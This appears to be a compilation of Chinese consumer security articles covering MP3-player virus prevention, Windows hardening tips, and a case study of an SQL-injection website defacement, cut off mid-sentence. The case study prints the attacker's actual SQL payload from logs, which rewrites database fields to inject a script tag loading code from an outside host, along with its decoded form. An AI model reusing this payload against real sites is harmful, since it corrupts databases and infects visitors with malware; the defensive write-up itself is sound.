在我们使用MP3播放器的过程中,经常要把MP3和计算机连接后进行文件拷贝,这样就很容易发生MP3播放器被病毒感染的情况。那么我们应该从下面几个方面来进行预防:
1.打开写保护开关。如果MP3播放器带有写保护开关,并且也没有往设备上写文件时,最好在连到计算机前打开写保护开关,这样就从源头上切断了病毒传播的途径。
2.安装移动版杀毒软件。现在多知名杀毒厂家都推出了专门针对MP3、闪存和移动硬盘等移动设备使用的杀毒软件。当然安装上移动版杀毒软件后,我们要及时升级病毒库,这样才能做到防患于未然。
3.手动更改目录内容。如果你的MP3播放器没有写保护开关,同时也没有移动版杀毒软件,那么还有一个较为简单的办法来防止病毒的入侵。在MP3播放器根目录下面通过记事本工具手工创建一个名字为“Autorun.inf文件,这样一来一些病毒日后就无法往MP3播放器根目录下面自动生成“Autorun.inf文件了,无法通过MP3播放器进行非法传播。同样,这种预防病毒的方法也适用于移动硬盘。该方法可以防止多数低级病毒的入侵,但如果遇到高级黑客编写的病毒,则应用其他方法防毒。
4.有病毒则应格式化。即便是采取了这些措施,有时候也无法彻底避免MP3感染病毒的现象。我们的MP3感染病毒后怎么办呢?这时一定要注意,在没有对病毒进行处理之前,不要把该MP3连接到别的计算机上使用,因为那样可能会造成交叉感染,进一步扩大病毒的传播范围。这时候我们要做的是对MP3播放器进行格式化处理,在格式化的过程中,要特别注意选择正确的文件格式。另外要尽可能地采用厂家提供的格式化程序(一般厂家的随机光盘中或者官方网站上都提供),否则可能会出现格式化后MP3无法正常使用的问题。
2008北京奥运会一天天的临近了。作为互联网也第一次登上了奥运的舞台。面对复杂的国际形式,如何才能保障互联网的安全,也已成为我们的同识。前几天我们报道了有关国外黑客要借北京奥运报复中国的新闻。除了那些奥运黑客,还有很多敌对势力也在虎势眈眈。现在我想通过我们前一段时间的介绍,大家对“肉鸡也有所了解了。拒绝成为“肉鸡,为奥运尽我们绵薄之力。下面,编辑在为大家介绍一些有关系统安全方面的技巧。
一、关闭“文件和打印共享
文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享的情况下,我们可以将它关闭。用鼠标右击“网络邻居,选择“属性,然后单击“文件和打印共享按钮,将弹出的“文件和打印共享对话框中的两个复选框中的钩去掉即可。
虽然“文件和打印共享关闭了,但是还不能确保安全,还要修改注册表,禁止它人更改“文件和打印共享。打开注册表编辑器,选择
“HKEY_CURRENT_USER/Software/Microsoft/Windows/
CurrentVersion/PolicIEs/NetWork
主键,在该主键下新建DWord类型的键值,键值名为“NoFileSharingControl,键值设为“1表示禁止这项功能,从而达到禁止更改“文件和打印共享的目的;键值为“0表示允许这项功能。这样在“网络邻居的“属性对话框中“文件和打印共享就不复存在了。
二、把Guest账号禁用
有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具,那还是禁止的好。打开控制面板,双击“用户和密码,单击“高级选项卡,再单击“高级按钮,弹出本地用户和组窗口。在Guest账号上面点击右键,选择属性,在“常规页中选中“账户已停用。另外,将Administrator账号改名可以防止黑客知道自己的管理员账号,这会在很大程度上保证计算机安全。
三、禁止建立空连接
在默认的情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。方法是修改注册表:打开注册表
“HKEY_LOCAL_MacHINE/System/CurrentControlSet/Control/LSA,
将DWORD值“RestrictAnonymous的键值改为“1即可。
四、隐藏IP地址
黑客经常利用一些网络探测技术来查看我们的主机信息,主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念,如果攻击者知道了你的IP地址,等于为他的攻击准备好了目标,他可以向这个IP发动各种进攻,如Dos( 拒绝服务 )攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。 与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。
代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。提供免费代理服务器的网站有很多,你也可以自己用代理猎手等工具来查找。
SQL注入作为直接威胁web业务的最严重攻击行为,已经被大多数的网站管理员所了解,这种通过HTTP标准端口,利用网页编码不严谨,提交精心构造的代码实现对数据库非授权访问的攻击方法,已经被越来越多的scriptguy(脚本小子)成功掌握并广泛实践。没错,他们可能并不知道SQL注入的原理,不知道ASP,不知道PHP,但他们有工具,全自动的,完善的,高效率的工具,这些工具使得任何一个有简单网络知识的中学学生可以很容易的拿到某个政府网站的最高管理员权限,而且做这些事情并不会比你在周六的中午下楼去买一听可乐要更困难。
而随着互联网黑色产业链的浮出水面,骇客们发现攻击网站不仅仅可以用作向朋友炫耀的资本,还可以作为购买游戏点卡或者是数码相机的资金来源:在被攻击的网站嵌入脚本木马,可以轻易盗窃那些访问了受攻击网站,但个人PC安全防护措施不全面用户的私密信息,比如游戏账号密码,或者是银行账号密码。
经常使用google的用户一定对这段话不陌生“该网站可能含有恶意软件,有可能会危害您的电脑,这意味着这个网站也许已经遭遇挂马黑手,成为骇客们的众多取款点之一。本文就一例真实案例,来介绍一下网站的安全防护。
某市房地产网站的管理员小李刚上班就被叫到领导办公室去了,因为网站带上了google小尾巴:“该网站可能含有恶意软件,有可能会危害您的电脑,购房者看到这一提示信息,纷纷给该市房产管理局打电话,于是就有了上面的一幕。回到座位上的小李一筹莫展:网站服务器已经全盘杀毒好几次了,没有发现病毒存在的痕迹,看来只能找专业安全厂商解决了。小李选择的是国内著名的一家网络安全公司,在向该安全公司提交web日志的第二天,小李就收到了回信,从日志的分析结果中,可以清楚的看到骇客的攻击走向:这是一次非常典型的SQL注入攻击,首先使用dEcLaRe建立游标,遍历数据库中所有允许写入字符串的相关字段,并通过执行exec操作,使用update语句替换了网站页面的正常文件,插入了如下一段十六进制字符:
exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20f
经过解密,可以得到如下字符串
"][/title][script src=http://s.see9.us/s.js][/script][!—
这里面的http://s.see9.us/s.js就是导致网站带有小尾巴的罪魁祸首。
经过一天的奋力工作,网页中所有的小尾巴都清理干净了,在安全工程师的建议下,小李还向StopBadware.org 申请了重新的索引,并向google提交了审核申请。做完了这些之后,小李又一次陷入了困扰:如何防范网站再次遭受SQL注入攻击呢?网络上提供了一些代码修改级的防御方法,可是需要对每一个页面都做仔细的检查,看着自己所负责网站的10000余个页面,小李只能是苦笑,联想起2007年夏天那次微软